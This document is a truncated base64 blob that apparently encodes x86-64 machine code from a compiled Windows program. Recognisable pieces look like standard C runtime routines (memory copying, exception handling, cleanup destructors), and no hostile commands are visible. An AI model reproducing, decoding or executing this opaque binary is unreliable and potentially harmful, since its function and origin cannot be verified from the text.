IN9HxCL93IJSItNB+jAGgAASLv///////8AAIP//w+F7f7//0yLTddBjUcBSI1V50iNTcdMY8BJ/8nowgIAAEiDff8QTYtGEEmLTghIjVXnSA9DVefoN/X//4XAD4RIAQAASYtGEEiLSChIhcl0BkyLIUwj40mLTghJi9ToQPH//4XAD4QhAQAASYtGCMeAoAAAAIMAAABJi04I6AH0//+FwA+EAgEAAEmLVghIi4rQAQAASImK4AEAAEiFyQ+EpAAAAEiLSQjpngAAAEmLRghIi4i4AAAASImIyAAAAEiFyXQYSItBCEiFwHQPSItASItIIIHhAAgAAHUSSYtOCEiLgbgAAABIiYHIAAAASIN9HxByCUiLTQfotBkAAE2L9UiDfd8QTIu8JNgAAABIi7wk0AAAAEiLtCTIAAAAcglIi03H6IkZAABJi8ZIi00nSDPM6MoSAABIgcSQAAAAQV5BXUFcW13DSYvNSIXJdDVmkEiLQQhEOGgJdClIi4rgAQAASIXJdBVIiwlIiYrgAQAASIXJdAZIi0kI6wNJi81Ihcl1zUmJThjrA02L9UiDff8QcglIi03n6BQZAABIx0X/DwAAAEyJbfdEiG3n6U7///9IjQ2wPQEA6OsRAADMzMxMiUwkIFVWQVZIg+wwSIvxSItJGEWL8EiL6kiFyQ+ElAAAAEiLATPSSIlcJFhIiXwkYP9QEEiL+EiL2Lj/////SCt8JGhJO/5JD0f+SDv4dhi4AQAAAEiLXCRYSIt8JGBIg8QwQV5eXcNIi04YSI1UJFBEi89IiwFIiVQkIEiNVCRoTIvF/1AYhcB0JItMJFBIO891G0iLRCRwSCvZSCtcJGiJCEiLRCR4SIkYM8DrprgDAAAA65+4AgAAAEiDxDBBXl5dw8zMzMzMzMzMzMzMQFNIg+wgSIvZSItJGEiFyXQKSIsBugEAAAD/EEiLSxBIhcl0CkiLAboBAAAA/xBIiwtIhcl0CkiLAboBAAAA/xBIi8tIg8QgW+nSFwAAzMxAU0iD7DAzwEiL2kjHQhgPAAAASIlCEIgCSIvRSIvLiUQkIOhYzf//SIvDSIPEMFvDzMzMzMzMzMzMzMzMzMzMSI0FqT0BAEiJATPASIlBGEiJQRBIiUEgiUEISIvBw8xAU0iD7CBIg3kQAEiNBX49AQBIi9lIiQF0OmYPH0QAAEiLQxBIiwhIiUsgSItICEiFyXQKSIsBugEAAAD/EEiLSxDoKRcAAEiLQyBIiUMQSIXAdcwzwEiJQxhIiUMQSIlDIIlDCEiDxCBbw8zMzMzMSIlcJAhXSIPsIEiL2bkQAAAASIv66EoXAABIhcB1C0iLXCQwSIPEIF/DSIl4CEjHAAAAAABIi0sYSIXJdQZIiUMQ6wNIiQH/QwhIiUMYSItcJDC4AQAAAEiDxCBfw8zMQFNIg+wgSIN5EABIjQWePAEASIvZSIkBdDBmDx9EAABIi0MQSIsISIlLIEiLSAjobBYAAEiLSxDoYxYAAEiLQyBIiUMQSIXAddYzwEiJQxhIiUMQSIlDIIlDCEiDxCBbw8zMzMzMzMzMzMzMzMzMzEBTSIPsIEiDeRAASI0FHjwBAEiL2UiJAXQ6Zg8fRAAASItDEEiLCEiJSyBIi0gISIXJdApIiwG6AQAAAP8QSItLEOjpFQAASItDIEiJQxBIhcB1zDPASIlDGEiJQxBIiUMgiUMISIPEIFvDzMzMzMxAU0iD7CBIg3kQAEiNBZ47AQBIi9lIiQF0OmYPH0QAAEiLQxBIiwhIiUsgSItICEiFyXQKSIsBugEAAAD/EEiLSxDoeRUAAEiLQyBIiUMQSIXAdcwzwEiJQxhIiUMQSIlDIIlDCEiDxCBbw8zMzMzMSIlcJAhXSIPsIEiDeRAASI0FWjsBAIv6SIkBSIvZdDRIi0MQSIsISIlLIEiLSAhIhcl0CkiLAboBAAAA/xBIi0sQ6AkVAABIi0MgSIlDEEiFwHXMM8BIiUMYSIlDEEiJQyCJQwhA9scBdAhIi8vo3RQAAEiLw0iLXCQwSIPEIF/DzMzMzMzMzMzMzMzMzMzMSIlcJAhXSIPsIEiDeRAASI0FujoBAIv6SIkBSIvZdCpIi0MQSIsISIlLIEiLSAjojBQAAEiLSxDogxQAAEiLQyBIiUMQSIXAddYzwEiJQxhIiUMQSIlDIIlDCED2xwF0CEiLy+hXFAAASIvDSItcJDBIg8QgX8PMzMzMzMzMzMxIiVwkCFdIg+wgSIN5EABIjQUqOgEAi/pIiQFIi9l0NEiLQxBIiwhIiUsgSItICEiFyXQKSIsBugEAAAD/EEiLSxDo+RMAAEiLQyBIiUMQSIXAdcwzwEiJQxhIiUMQSIlDIIlDCED2xwF0CEiLy+jNEwAASIvDSItcJDBIg8QgX8PMzMzMzMzMzMzMzMzMzMxIiVwkCFdIg+wgSIN5EABIjQWKOQEAi/pIiQFIi9l0NEiLQxBIiwhIiUsgSItICEiFyXQKSIsBugEAAAD/EEiLSxDoaRMAAEiLQyBIiUMQSIXAdcwzwEiJQxhIiUMQSIlDIIlDCED2xwF0CEiLy+g9EwAASIvDSItcJDBIg8QgX8PMzMzMzMzMzMzMzMzMzMxIiVwkCFdIg+wgSI0F1zgBAIvaSIv5SIkB6FLN///2wwF0CEiLz+j1EgAASIvHSItcJDBIg8QgX8PMzMzMzMzMQFVWV0FUQVVBVkFXSIHsgAAAAEjHRCRA/v///0iJnCTIAAAASIsFxXUBAEgzxEiJRCRwSYvoTIvxSIlMJEjoDcz//5BIjQUNOAEASYkGSI0FezgBAEmJRnBFM+RNiaaIAAAATYmmgAAAAE2JppAAAABFiWZ4SIN9GP8PhEECAABFi/xMiWQkOEiNRCQwSIlEJCBFjUwkIEyNRCRQSI1UJDhJi87oB9H//4XAD4QQAgAASb3///////8AAA8fRAAAg3wkMCAPhfYBAACLTCRQwekE/8mD+RAPh+QBAABIi1wkYEkj3Ug7XRgPhJsBAAC/AQAAANPnhb2gAAAAD4SIAQAAuSgDAADoOBIAAEiJRCQ4SIXAdBFIi1UISIvI6G7f//9Ii/DrA0mL9LkQAAAA6BASAABIhcB0KkiJcAhMiSBJi46IAAAASIXJdQlJiYaAAAAA6wNIiQFJiYaIAAAAQf9GeIm+oAAAAEiL00iLzuhc6P//hcAPhEUBAABIi87oLOv//4tEJFDB6AT/yIP4EHMfSI0MgEiLnM64AAAASImczsgAAABIhdt0BkiLWwjrA0mL3EiF2w+EoAAAAA8fAItEJFDB6AT/yEiNDIBIjTzNAAAAAEgD/bkQAAAA6GIRAABIhcB0LEiJWAhMiSBIi4/AAAAASIXJdQlIiYe4AAAA6wNIiQFIiYfAAAAA/4ewAAAAi0QkUMHoBP/Ig/gQczBIjQSASI0MxkiLgcgAAABIhcB0CkiLAEiJgcgAAABIi5nIAAAASIXbdAZIi1sI6wNJi9xIhdsPhWP///+LRCRQwegE/8hIjQyATImkzsAAAABMiaTOuAAAAEyJpM7IAAAARImkzrAAAAAPt0QkVEwD+EyJfCQ4SI1EJDBIiUQkIEG5IAAAAEyNRCRQSI1UJDhJi87o987//4XAD4X//f//SYvGSItMJHBIM8zoXwkAAEiLnCTIAAAASIHEgAAAAEFfQV5BXUFcX15dw8zMzMxIiUwkCFNIg+wwSMdEJCD+////SIvZSI0FSzUBAEiJAUiNBbk1AQBIiUFwSIO5gAAAAAB0Q0iLg4AAAABIiwhIiYuQAAAASItICEiFyXQKSIsBugEAAAD/EEiLi4AAAADoiw8AAEiLg5AAAABIiYOAAAAASIXAdb0zwEiJg4gAAABIiYOAAAAASImDkAAAAIlDeEiLy0iDxDBb6aHJ///MQFVWV0FUQVVBVkFXSIPsYEjHRCQw/v///0iJnCSoAAAASIsFOHIBAEgzxEiJRCRYTYvoTIvxSIlMJCBIjQXuNgEASIkBSIlRCEyJQShJi0AID7dICGZBiU4QSYtACItIDEGJThRJi0AIi0gUQYlOGEmLQAhIi0ggSYlOIEiNBYU2AQBJiQZJiVYwD7dCFEgDwkmJRjiLQhBBiUZASI0F/TMBAEmJBkiNBZM0AQBJiUZIRTPkTYlmYE2JZlhNiWZoRYlmUEmDeBj/D4TzAQAARYv8SL////////8AAA8fQABBi15ARDv7D4PVAQAAQY1HIDvDdgVBK9/rBbsgAAAARIvDQYvXSQNWOEiNTCQ46L0HAACD+yAPhaYBAACLdCQ4we4E/86D/hAPh5QBAABIi1wkSEgj30k7XRgPhHUBAACLzr8BAAAA0+dBhb2gAAAAD4RVAQAAuSgDAADoVA4AAEiJRCQoSIXAdBFJi1UISIvI6Irb//9Ii+jrA0mL7LkQAAAA6CwOAABIhcB0IUiJaAhMiSBJi05gSIXJdQZJiUZY6wNIiQFJiUZgQf9GUIm9oAAAAEiL00iLzeiB5P//hcAPhPsAAABIi83oUef//4P+EHMfSI0MtkiLnM24AAAASImczcgAAABIhdt0BkiLWwjrA0mL3EiF2w+EiAAAAEiNDLZIjTzNAAAAAEkD/WaQuRAAAADomg0AAEiFwHQsSIlYCEyJIEiLj8AAAABIhcl1CUiJh7gAAADrA0iJAUiJh8AAAAD/h7AAAACD/hBzL0iNDLZIi4TNyAAAAEiFwHQLSIsASImEzcgAAABIi5zNyAAAAEiF23QGSItbCOsDSYvcSIXbdYlIjQy2TImkzcAAAABMiaTNuAAAAEyJpM3IAAAARImkzbAAAABIv////////wAAD7dEJDxMA/jpHv7//0mLxkiLTCRYSDPM6M4FAABIi5wkqAAAAEiDxGBBX0FeQV1BXF9eXcPMzMzMzMxIiUwkCFNIg+wwSMdEJCD+////SIvZSI0FkzEBAEiJAUiNBSkyAQBIiUFISIN5WAB0QmZmZmZmZg8fhAAAAAAASItDWEiLCEiJS2hIi0gISIXJdApIiwG6AQAAAP8QSItLWOj5CwAASItDaEiJQ1hIhcB1zDPASIlDYEiJQ1hIiUNoiUNQSI0FtDMBAEiJA0iDxDBbw8zMzMzMzMzMzMzMSIlMJAhTSIPsQEjHRCQw/v///0iL2egVxf//kEiNBcUwAQBIiQNIx4OAAAAA/////4N7YAB0ZUiLQzBIi0gwSIlLcEiLQwiAeAgAdA6LSxTomwQAAEiJQ3jrUYvJ6I4EAABIiUN4SMdEJGgAAAAASI1MJFBIiUwkIESLS3BMi8BIjVQkaEiLy+gDyv//hcB0E4tDcDlEJFB0EusISMdDcAAAAABIx0N4AAAAAEiLw0iDxEBbw8zMzMzMzMzMzMzMSIlMJAhXSIPsMEjHRCQg/v///0iJXCRISIvZSI0FvjIBAEiJAUiJUQhMiUEoSYtACEQPt0gIZkSJSRBJi0AIRItIDESJSRRJi0AIi0gUiUsYSYtACEiLSCBIiUsgSI0FVDIBAEiJA0iJUzAPt0IUSAPCSIlDOItCEIlDQEiNDX0vAQBIiQtIx0NY/////0iJQ0iAeggAdA5Bi8nokAMAAEiJQ1DrP0iLyOiCAwAASIlDUItTSDP/hdJ0HYtLQIXJdBuL+jvRD0f5RIvHSItTOEiLyOioAwAAO3tIdAhIx0NQAAAAAEiLw0iLXCRISIPEMF/DzMzMzMzMzMzMzMzMzEiJXCQIV0iD7CCL2kiL+ej8+f//9sMBdAhIi8/o3wkAAEiLx0iLXCQwSIPEIF/DzEiJXCQIV0iD7CCL2kiL+ehc/f//9sMBdAhIi8/orwkAAEiLx0iLXCQwSIPEIF/DzEiJXCQIV0iD7CBIjQW3LgEASIvZi/pIiQFIi0l4SIXJdAXoeQkAAEiLy+jBw///QPbHAXQISIvL6GMJAABIi8NIi1wkMEiDxCBfw8zMzMzMSIlcJAhXSIPsIEiNBT8uAQBIi9mL+kiJAUiLSVBIhcl0BegpCQAASI0FAjEBAEiJA0D2xwF0CEiLy+gRCQAASIvDSItcJDBIg8QgX8PMzMxIg+lI6cfS///MzMxIg+lI6evN///MzMxIgz24wgAAAEiNBanCAAB0DzkIdA5Ig8AQSIN4CAB18TPAw0iLQAjDSIM94L0AAABIjQXRvQAAdA85CHQOSIPAEEiDeAgAdfEzwMNIi0AIw0BTSIPsIEiL2ehSGwAASI0Fe9EAAEiJA0iLw0iDxCBbw8zMzEBTSIPsIEiL2eguGwAASI0Fl9EAAEiJA0iLw0iDxCBbw8zMzEBTSIPsIEiL2egKGwAASI0FW9EAAEiJA0iLw0iDxCBbw8zMzEBTSIPsIEiL2ejmGgAASI0FZ9EAAEiJA0iLw0iDxCBbw8zMzEiNBfnQAABIiQHp7RoAAMzp5xoAAMzMzEiJXCQIV0iD7CBIjQXX0AAAi9pIi/lIiQHoxhoAAPbDAXQISIvP6MUHAABIi8dIi1wkMEiDxCBfw8zMzEiJXCQIV0iD7CCL2kiL+eiUGgAA9sMBdAhIi8/okwcAAEiLx0iLXCQwSIPEIF/DzEiD7EhIjQWB0AAASI1UJFBIjUwkIEG4AQAAAEiJRCRQ6AsaAABIjQVQ0AAASI0VoVkBAEiNTCQgSIlEJCDoGhIAAMzMSIPsSEiJTCRQSI1UJFBIjUwkIOikGQAASI0FWdAAAEiNFRpaAQBIjUwkIEiJRCQg6OMRAADMzMxIg+xISIlMJFBIjVQkUEiNTCQg6GwZAABIjQU50AAASI0VSloBAEiNTCQgSIlEJCDoqxEAAMzMzOkvBwAAzMzMzMzMzMzMzMzMzMzMzMxmZg8fhAAAAAAASDsNuWkBAHURSMHBEGb3wf//dQLzw0jByRDpdQkAAMzMzMzMzMxmZg8fhAAAAAAATIvZTIvSSYP4EA+GqQAAAEgr0XMPSYvCSQPASDvID4xGAwAAD7ol8IYBAAFzE1dWSIv5SYvySYvI86ReX0mLw8P2wQd0NvbBAXQLigQKSf/IiAFI/8H2wQJ0D2aLBApJg+gCZokBSIPBAvbBBHQNiwQKSYPoBIkBSIPBBE2LyEnB6QUPhd4BAABNi8hJwekDdBRIiwQKSIkBSIPBCEn/yXXwSYPgB02FwHUFSYvDw5BIjRQKTIvR6wNNi9NMjQ3dp///SYvAQ4uEgTNYAABJA8H/4HdYAAB7WAAAhlgAAJJYAACnWAAAsFgAAMJYAADVWAAA8VgAAPtYAAAOWQAAIlkAAD9ZAABQWQAAalkAAIVZAACpWQAASYvDw0gPtgJBiAJJi8PDSA+3AmZBiQJJi8PDSA+2AkgPt0oBQYgCZkGJSgFJi8PDiwJBiQJJi8PDSA+2AotKAUGIAkGJSgFJi8PDSA+3AotKAmZBiQJBiUoCSYvDw0gPtgJID7dKAYtSA0GIAmZBiUoBQYlSA0mLw8NIiwJJiQJJi8PDSA+2AkiLSgFBiAJJiUoBSYvDw0gPtwJIi0oCZkGJAkmJSgJJi8PDSA+2AkgPt0oBSItSA0GIAmZBiUoBSYlSA0mLw8OLAkiLSgRBiQJJiUoESYvDw0gPtgKLSgFIi1IFQYgCQYlKAUmJUgVJi8PDSA+3AotKAkiLUgZmQYkCQYlKAkmJUgZJi8PDTA+2AkgPt0IBi0oDSItSB0WIAmZBiUIBQYlKA0mJUgdJi8PD8w9vAvNBD38CSYvDw2ZmDx+EAAAAAABmZmaQZmaQSYH5ACAAAHNCSIsECkyLVAoISIPBIEiJQeBMiVHoSItECvBMi1QK+En/yUiJQfBMiVH4ddRJg+Af6eT9//9mZmYPH4QAAAAAAGaQSIH6ABAAAHK1uCAAAAAPGAQKDxhECkBIgcGAAAAA/8h17EiB6QAQAAC4QAAAAEyLDApMi1QKCEwPwwlMD8NRCEyLTAoQTItUChhMD8NJEEwPw1EYTItMCiBMi1QKKEiDwUBMD8NJ4EwPw1HoTItMCvBMi1QK+P/ITA/DSfBMD8NR+HWqSYHoABAAAEmB+AAQAAAPg3H////wgAwkAOko/f//ZmZmZg8fhAAAAAAAZmZmkGZmZpBmkEkDyPbBB3Q29sEBdAtI/8mKBApJ/8iIAfbBAnQPSIPpAmaLBApJg+gCZokB9sEEdA1Ig+kEiwQKSYPoBIkBTYvIScHpBXVGTYvIScHpA3QUSIPpCEiLBApJ/8lIiQF18EmD4AdNhcB1DUmLw8NmDx+EAAAAAABJK8hMi9FIjRQK6c38//+QZmZmkGZmkEmB+QAgAABzQkiLRAr4TItUCvBIg+kgSIlBGEyJURBIi0QKCEyLFApJ/8lIiUEITIkRddVJg+Af64BmZmZmZmZmDx+EAAAAAABmkEiB+gDw//93tbggAAAASIHpgAAAAA8YBAoPGEQKQP/IdexIgcEAEAAAuEAAAABMi0wK+EyLVArwTA/DSfhMD8NR8EyLTAroTItUCuBMD8NJ6EwPw1HgTItMCthMi1QK0EiD6UBMD8NJGEwPw1EQTItMCghMixQK/8hMD8NJCEwPwxF1qkmB6AAQAABJgfgAEAAAD4Nx////8IAMJADpxP7//0BTSIPsILoIAAAAjUoY6O0bAABIi8hIi9j/FdWzAABIiQW2oAEASIkFp6ABAEiF23UFjUMY6wZIgyMAM8BIg8QgW8PMSIlcJAhIiXQkEEiJfCQYQVRBVkFXSIPsIEyL4eivGQAAkEiLDW+gAQD/FYmzAABMi/BIiw1XoAEA/xV5swAASIvYSTvGD4KbAAAASIv4SSv+TI1/CEmD/wgPgocAAABJi87oGRsAAEiL8Ek7x3NVugAQAABIO8JID0LQSAPQSDvQchFJi87oLRwAADPbSIXAdRrrAjPbSI1WIEg71nJJSYvO6BEcAABIhcB0PEjB/wNIjRz4SIvI/xXzsgAASIkF1J8BAEmLzP8V47IAAEiJA0iNSwj/FdayAABIiQWvnwEASYvc6wIz2+jvGAAASIvDSItcJEBIi3QkSEiLfCRQSIPEIEFfQV5BXMPMzEiD7Cjo6/7//0j32BvA99j/yEiDxCjDzEiD7ChIiw1hhwEA/xWDsgAASIXAdAL/0LkZAAAA6EoeAAC6AQAAADPJ6K4gAADoxSAAAMzpHyEAAMzMzEiD7ChIi8JIjVERSI1IEehkIQAAhcAPlMBIg8Qow8zMSIlcJAhXSIPsIEiNBS/JAACL2kiL+UiJAeiiIQAA9sMBdAhIi8/orf///0iLx0iLXCQwSIPEIF/DzMzMQFNIg+xASIvZ6w9Ii8volSIAAIXAdBNIi8vo0SEAAEiFwHTnSIPEQFvDSI0Fc8gAAEiNVCRYSI1MJCBBuAEAAABIiUQkWOj9EQAASI0FQsgAAEiNFZNRAQBIjUwkIEiJRCQg6AwKAADMzMzMSIl8JAgz/0yLyU2FwHQuSCvRD7cECmaJAUiDwQJmhcB0BUn/yHXrTYXAdBFJ/8h0DA+3x0iL+UmLyGbzq0iLfCQISYvBw8zMQFNIg+wgSIvZxkEYAEiF0g+FggAAAOjBMAAASIlDEEiLkMAAAABIiRNIi4i4AAAASIlLCEg7Fd1pAQB0FouAyAAAAIUFO2sBAHUI6KgkAABIiQNIiwXGYwEASDlDCHQbSItDEIuIyAAAAIUNFGsBAHUJ6HkoAABIiUMISItLEIuByAAAAKgCdRaDyAKJgcgAAADGQxgB6wcPEALzD38BSIvDSIPEIFvDSIlcJBBmiUwkCFVIi+xIg+xQuP//AABmO8gPhKQAAABIjU3g6C////9Ii13gSIuDOAEAAEiFwHUTD7dVEI1Cn2aD+Bl3amaD6iDrZA+3TRC6AAEAAGY7ynMlugIAAADorC0AAIXAdQYPt1UQ60IPt00QSIuDGAEAAA+2FAjrMUiNTSBBuQEAAABMjUUQRIlMJChIiUwkIEiLyLoAAgAA6NQtAAAPt1UQhcB0BA+3VSCAffgAdAtIi03wg6HIAAAA/Q+3wkiLXCRoSIPEUF3DzDPS6Sn////MQFNIg+wgSIvZ/xXBrwAAuQEAAACJBc59AQDoTTEAAEiLy+iRNgAAgz26fQEAAHUKuQEAAADoMjEAALkJBADASIPEIFvpTzYAAMzMzEiJTCQISIPsOLkXAAAA6B2dAACFwHQHuQIAAADNKUiNDad4AQDobjEAAEiLRCQ4SIkFjnkBAEiNRCQ4SIPACEiJBR55AQBIiwV3eQEASIkF6HcBAEiLRCRASIkF7HgBAMcFwncBAAkEAMDHBbx3AQABAAAAxwXGdwEAAQAAALgIAAAASGvAAEiNDb53AQBIxwQBAgAAALgIAAAASGvAAEiLDYZfAQBIiUwEILgIAAAASGvAAUiLDXlfAQBIiUwEIEiNDcXFAADo6P7//0iDxDjDzMzMSIPsKLkIAAAA6AYAAABIg8Qow8yJTCQISIPsKLkXAAAA6DacAACFwHQIi0QkMIvIzSlIjQ2/dwEA6BYwAABIi0QkKEiJBaZ4AQBIjUQkKEiDwAhIiQU2eAEASIsFj3gBAEiJBQB3AQDHBeZ2AQAJBADAxwXgdgEAAQAAAMcF6nYBAAEAAAC4CAAAAEhrwABIjQ3idgEAi1QkMEiJFAFIjQ0TxQAA6Db+//9Ig8Qow8xIi8RIiVgYSIlwIEiJUBBIiUgIV0FWQVdIg+wwTYv5RYvwSIvySIv5M9uJWNiJXCQkQTvefRJIi89B/9dIA/5IiXwkUP/D6+XHRCQgAQAAAEiLXCRgSIt0JGhIg8QwQV9BXl/DSIvETIlIIESJQBhIiVAQU1ZXQVZIg+w4TYvxSWP4SIvyg2DIAEiL30gPr9pIA9lIiVgI/8+JfCRweBBIK95IiVwkYEiLy0H/1uvox0QkIAEAAABIg8Q4QV5fXlvDzMzMSIlcJBBEiUQkGEiJTCQIVldBVkiD7EBJi/FBi/hMi/JIi9n/z4l8JHB4D0kr3kiJXCRgSIvL/9br6esASItcJGhIg8RAQV5fXsPMzEBTSIPsQIM9+4EBAABIY9l1EkiLBbdmAQAPtwRYJQMBAADrVUiNTCQgM9LocPv//0iLRCQgg7jUAAAAAX4VTI1EJCC6AwEAAIvL6Ak0AACLyOsRSIuACAEAAA+3DFiB4QMBAACAfCQ4AHQMSItEJDCDoMgAAAD9i8FIg8RAW8PMTIlEJBhMiUwkIFVTVldIi+xIg+xYSINlyABIi9oz0kmL8EiL+USNQihIjU3Q6FZEAABIhfZ1FejMQwAAxwAWAAAA6Bk2AACDyP/rXEiF23QFSIX/dOG4////f0yNTUBIjU3ISDvYSIvWx0XgQgAAAA9H2EUzwEiJfdiJXdBIiX3I6MI3AACL2EiF/3Qb/03QeAlIi0XIxgAA6wtIjVXIM8noFjYAAIvDSIPEWF9eW13DzMzMzMzMzMzMzMzMzGZmDx+EAAAAAABIK9FNhcB0avfBBwAAAHQdD7YBOgQRdV1I/8FJ/8h0UoTAdE5I98EHAAAAdeNJu4CAgICAgICASbr//v7+/v7+/o0EESX/DwAAPfgPAAB3wEiLAUg7BBF1t0iDwQhJg+gIdg9OjQwQSPfQSSPBSYXDdM8zwMNIG8BIg8gBw8zMzE2FwHQMOBF0CEj/wUn/yHX0SffYSBvASCPBw8xMiUQkGFNIg+wgSYvYg/oBdX3o+UUAAIXAdQczwOk3AQAA6N0rAACFwHUH6ABGAADr6eg1TwAA/xXfqgAASIkFuJcBAOgvTgAASIkF3HgBAOjnRQAAhcB5B+gmLAAA68vod0kAAIXAeB/oKkwAAIXAeBYzyegrDwAAhcB1C/8FuXgBAOnMAAAA6NtIAADryoXSdVKLBaN4AQCFwA+Oev/////IiQWTeAEAORXVeAEAdQXo3g4AAOhpDQAASIXbdRDoo0gAAOi6KwAA6GFFAACQSIXbdX+DPTBgAQD/dHbooSsAAOtvg/oCdV6LDRxgAQDo1ywAAEiFwHVaungEAACNSAHoARIAAEiL2EiFwA+ECP///0iL0IsN8F8BAOjHLAAASIvLhcB0FjPS6BEqAAD/Fe+pAACJA0iDSwj/6xbohRgAAOnT/v//g/oDdQczyegIKQAAuAEAAABIg8QgW8PMSIlcJAhIiXQkEFdIg+wgSYv4i9pIi/GD+gF1BehLTAAATIvHi9NIi85Ii1wkMEiLdCQ4SIPEIF/pAwAAAMzMzEiLxEiJWCBMiUAYiVAQSIlICFZXQVZIg+xQSYvwi9pMi/G6AQAAAIlQuIXbdQ85HWh3AQB1BzPA6dIAAACNQ/+D+AF3OEiLBTjAAABIhcB0CovT/9CL0IlEJCCF0nQXTIvGi9NJi87o9P3//4vQiUQkIIXAdQczwOmSAAAATIvGi9NJi87o2qr//4v4iUQkIIP7AXU0hcB1MEyLxjPSSYvO6L6q//9Mi8Yz0kmLzuit/f//SIsFyr8AAEiFwHQKTIvGM9JJi87/0IXbdAWD+wN1N0yLxovTSYvO6IH9///32BvJI8+L+YlMJCB0HEiLBZC/AABIhcB0EEyLxovTSYvO/9CL+IlEJCCLx+sCM8BIi5wkiAAAAEiDxFBBXl9ew8zMzMzMzMzMzMxmZg8fhAAAAAAASIvBSPfZSKkHAAAAdA9mkIoQSP/AhNJ0X6gHdfNJuP/+/v7+/v5+SbsAAQEBAQEBgUiLEE2LyEiDwAhMA8pI99JJM9FJI9N06EiLUPiE0nRRhPZ0R0jB6hCE0nQ5hPZ0L0jB6hCE0nQhhPZ0F8HqEITSdAqE9nW5SI1EAf/DSI1EAf7DSI1EAf3DSI1EAfzDSI1EAfvDSI1EAfrDSI1EAfnDSI1EAfjDSIlcJBBVSIvsSIPsYEiLBaS+AABIi9pIi9FIiUXASIsFm74AAEiJRchIiwWYvgAASIlF0EiLBZW+AABIiUXYSIsFkr4AAEiJReBIiwWPvgAASIlF6EiLBYy+AABIiUXwSIsFib4AAEiJRfhIhdt0EPYDEHQLSIsBSItI+EiLWTBIiVXoSI1VEEiLy0iJXfD/FRunAABIi9BIiUUQSIlF+EiF23Qb9gMIuQBAmQF0BYlN4OsMi0XgSIXSD0TBiUXgRItF2ItVxItNwEyNTeD/FeSmAABIi1wkeEiDxGBdw8xIiVwkEEiJbCQYVldBVEFWQVdIg+wgQYt4DEyL4UmLyEmL8U2L8EyL+uiSXwAATYsUJEyJFovohf90dEljRhD/z0iNFL9IjRyQSQNfCDtrBH7lO2sIf+BJiw9IjVQkUEUzwP8VeKYAAExjQxBEi0sMTANEJFBEixAzyUWFyXQXSY1QDEhjAkk7wnQL/8FIg8IUQTvJcu1BO8lznEmLBCRIjQyJSWNMiBBIiwwBSIkOSItcJFhIi2wkYEiLxkiDxCBBX0FeQVxfXsPMzMxIi8RIiVgISIloEEiJcBhIiXggQVRBVkFXSIPsIIt6DEiLbCRwSIvaSIvLSIvVRYvhM/bovF4AAESL8IX/dQXoqCwAAEyLVCRoTItEJGCL10GDCv9Bgwj/hf90KkxjWxBMi30IRI1K/0uNDIlJjQSPRjt0GAR+B0Y7dBgIfghBi9FFhcl13oXSdBONQv9IjRSASGNDEEiNNJBIA3UIM9KF/3RgRTPJSGNLEEgDTQhJA8lIhfZ0D4tGBDkBfiKLRgg5QQR/GkQ7IXwVRDthBH8PQYM4/3UDQYkQjUIBQYkC/8JJg8EUO9dyvUGLAIP4/3QSSI0MgEhjQxBIjQSISANFCOsKQYMgAEGDIgAzwEiLXCRASItsJEhIi3QkUEiLfCRYSIPEIEFfQV5BXMNIiVwkCEiJbCQQVldBVkiD7CBMjUwkUEmL+EiL6ujm/f//SIvVSIvPTIvw6JhdAACLXwyL8Osn/8voBiQAAEiNFJtIi4AoAQAASI0MkEhjRxBIA8g7cQR+BTtxCH4Ghdt11TPJSIXJdQZBg8n/6wREi0kETIvHSIvVSYvO6NNXAABIi1wkQEiLbCRISIPEIEFeX17DSIlcJAhIiWwkEEiJdCQYV0iD7EBJi/FJi+hIi9pIi/noiyMAAEiJmDgBAABIix/ofCMAAEiLUzhIi0wkeEyLTCRwx0QkOAEAAABIiZAwAQAAM9tIiVwkMIlcJChIiUwkIEiLD0yLxkiL1ejlWAAA6DwjAABIi4wkgAAAAEiLbCRYSIt0JGBIiZg4AQAAjUMBSItcJFDHAQEAAABIg8RAX8PMzMxIi8RMiUggTIlAGEiJUBBIiUgIU0iD7GBIi9mDYNgASIlI4EyJQOjo4CIAAEyLgOAAAABIjVQkSIsLQf/Qx0QkQAAAAADrAItEJEBIg8RgW8PMzMxAU0iD7CBIi9lIiRHopyIAAEg7mCABAABzDuiZIgAASIuIIAEAAOsCM8lIiUsI6IUiAABIiZggAQAASIvDSIPEIFvDzEiJXCQIV0iD7CBIi/noYiIAAEg7uCABAAB0BejQKQAA6E8iAABIi5ggAQAA6wlIO/t0GUiLWwhIhdt18uivKQAASItcJDBIg8QgX8PoIyIAAEiLSwhIiYggAQAA6+PMzEiD7CjoCyIAAEiLgCgBAABIg8Qow8zMzEiD7Cjo8yEAAEiLgDABAABIg8Qow8zMzEBTSIPsIEiL2ejWIQAASIuQIAEAAOsJSDkadBJIi1IISIXSdfKNQgFIg8QgW8MzwOv2zMxAU0iD7CBIi9nooiEAAEiJmCgBAABIg8QgW8PMQFNIg+wgSIvZ6IYhAABIiZgwAQAASIPEIFvDzEiLxEiJWBBIiXAYSIl4IFVBVkFXSI2oOPv//0iB7LAFAABIiwVrUgEASDPESImFoAQAAEiLnQgFAABMi/JIjRUQuQAATIv5SI1MJDBIi8JIC8FJi/lJi/BMjUwkMIPgD3ViuAEAAABEjUB/DygCDyhKEA8pAQ8oQiAPKUkQDyhKMA8pQSAPKEJADylJMA8oSlAPKUFADyhCYA8pSVAPKEpwSQPQDylBYEkDyA8pSfBI/8h1tw8oAkiLQhAPKQFIiUEQ6w5BuJgAAABJi8noMuj//0iLE0mLD0iNBVFSAABIiUQkUEiLhfAEAABMjUQkMEiJRCRgSGOF+AQAAEUzyUiJRCRoSIuFAAUAAEiJfCRYSIlEJHgPtoUQBQAASIl0JHBIiUWISItDQEyJdYBIiUQkKEiNRdBIx0WQIAWTGUiJRCQg/xXboAAASIuNoAQAAEgzzOh85///TI2cJLAFAABJi1soSYtzMEmLezhJi+NBX0FeXcPMzMxIiVwkEEiJdCQYV0iD7EBJi9lJi/hIi/FIiVQkUOjeHwAASItTCEiJkCgBAADozh8AAEiLVjhIiZAwAQAA6L4fAABIi1M4RIsCSI1UJFBMi8tMA4AoAQAAM8BIi86JRCQ4SIlEJDCJRCQoTIlEJCBMi8foLVUAAEiLXCRYSIt0JGBIg8RAX8PMQFNIg+wgSINhCABIjQXitwAAxkEQAEiJAUiLEkiL2ejkAAAASIvDSIPEIFvDzMzMSI0FvbcAAEiJAUiLAsZBEABIiUEISIvBw8zMzEBTSIPsIEiDYQgASI0FlrcAAEiL2UiJAcZBEADoGwAAAEiLw0iDxCBbw8zMSI0FdbcAAEiJAendAAAAzEiJXCQIV0iD7CBIi/pIi9lIO8p0IejCAAAAgH8QAHQOSItXCEiLy+hUAAAA6whIi0cISIlDCEiLw0iLXCQwSIPEIF/DSI